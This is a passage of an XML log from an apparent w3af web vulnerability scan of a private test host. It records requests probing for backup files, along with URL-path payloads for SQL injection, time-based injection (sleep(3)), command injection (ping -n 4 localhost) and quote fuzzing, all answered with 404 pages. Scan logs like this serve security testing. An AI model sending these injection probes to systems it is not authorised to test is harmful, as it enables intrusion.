                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="373">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="375">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="376">
                <http-request>
                    <status>GET http://10.12.68.43:31337/duiyq%3C%2F-%3Eduiyq%2F%2Aduiyq%22duiyqduiyq%27duiyqduiyq%60duiyqduiyq+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about duiyq%3C%2F-%3Eduiyq%2F%2Aduiyq%22duiyqduiyq%27duiyqduiyq%60duiyqduiyq+%3D has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='duiyq%3C%2F-%3Eduiyq%2F%2Aduiyq%22duiyqduiyq%27duiyqduiyq%60duiyqduiyq+%3D'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="380">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="392">
                <http-request>
                    <status>GET http://10.12.68.43:31337/14%22+OR+%2214%22%3D%2214 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 14%22+OR+%2214%22%3D%2214 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='14%22+OR+%2214%22%3D%2214'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="393">
                <http-request>
                    <status>GET http://10.12.68.43:31337/rQonmBmz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about rQonmBmz has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='rQonmBmz'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="409">
                <http-request>
                    <status>GET http://10.12.68.43:31337/sleep%283%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about sleep%283%29%3B has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='sleep%283%29%3B'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="411">
                <http-request>
                    <status>GET http://10.12.68.43:31337/14%22+AND+%2214%22%3D%2215 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 14%22+AND+%2214%22%3D%2215 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='14%22+AND+%2214%22%3D%2215'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="425">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27z%220 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27z%220 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27z%220'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="428">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3C%21-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3C%21-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3C%21--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="431">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about choucroute~ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='choucroute~'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="432">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="433">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="434">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="435">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="436">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="437">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27z%270 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27z%270 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27z%270'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="439">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="440">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="444">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="445">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="447">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="448">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
